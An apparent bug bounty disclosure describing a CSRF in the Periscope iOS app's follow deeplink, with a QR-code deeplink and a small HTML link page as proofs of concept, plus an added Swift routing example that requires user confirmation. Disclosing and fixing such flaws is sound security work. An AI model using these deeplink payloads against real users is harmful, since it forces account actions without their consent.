Periscope iOS app CSRF in follow action due to deeplink
Low
Vulnerability Details
Summary
This issue is mainly in the Periscope iOS app: the follow action is open to CSRF through a deeplink.
As in report #583987, the CSRF works on the iOS app.
POC 1
QR code to follow periscope profile
`pscp://user/periscopeco/follow`
███████
POC2 by kunal94
```
<!DOCTYPE html>
<html>
<a href="pscp://user/<any user-id>/follow">CSRF DEMO</a>
</html>
```
video
█████████
## Impact
CSRF follow against any user in the Periscope iOS app.
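One way an app can handle this class of deeplink defensively, as an added example that is not from the report and is not Periscope's code: the router treats `follow` as a state-changing action and returns a decision that requires an in-app confirmation instead of performing it. The type and function names and the user-id format are assumptions.

```swift
import Foundation

// Hypothetical deeplink router for the pscp:// scheme (names are assumptions).
// Any web page or QR code can open a custom-scheme URL, so the URL is treated
// as untrusted input and never as proof that the user wanted the action.
enum DeeplinkDecision: Equatable {
    case navigate(userID: String)       // read-only: open the profile
    case confirmFollow(userID: String)  // state-changing: ask the user first
    case reject(reason: String)
}

func route(_ url: URL) -> DeeplinkDecision {
    guard let parts = URLComponents(url: url, resolvingAgainstBaseURL: false),
          parts.scheme?.lowercased() == "pscp",
          parts.host?.lowercased() == "user" else {
        return .reject(reason: "unsupported deeplink")
    }
    // "/periscopeco/follow" -> ["periscopeco", "follow"]
    let segments = parts.path.split(separator: "/").map(String.init)
    // Assumed user-id format; the report does not define one.
    guard let userID = segments.first,
          userID.range(of: "^[A-Za-z0-9_]{1,64}$", options: .regularExpression) != nil else {
        return .reject(reason: "invalid user id")
    }
    let action = segments.count > 1 ? segments[1] : ""
    switch (action, segments.count) {
    case ("", 1):
        return .navigate(userID: userID)
    case ("follow", 2):
        // Do not call the follow API here. The caller opens the profile with an
        // explicit "Follow" prompt and only acts on the user's tap.
        return .confirmFollow(userID: userID)
    default:
        return .reject(reason: "unknown action")
    }
}

// Constructed sample inputs, including the deeplink from POC 1.
let samples = ["pscp://user/periscopeco/follow",
               "pscp://user/periscopeco",
               "pscp://user/periscopeco/follow/extra"]
for raw in samples {
    if let url = URL(string: raw) { print(raw, "->", route(url)) }
}
```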
Report Stats
- Report ID: 805073
- State: Closed
- Substate: resolved
- Upvotes: 55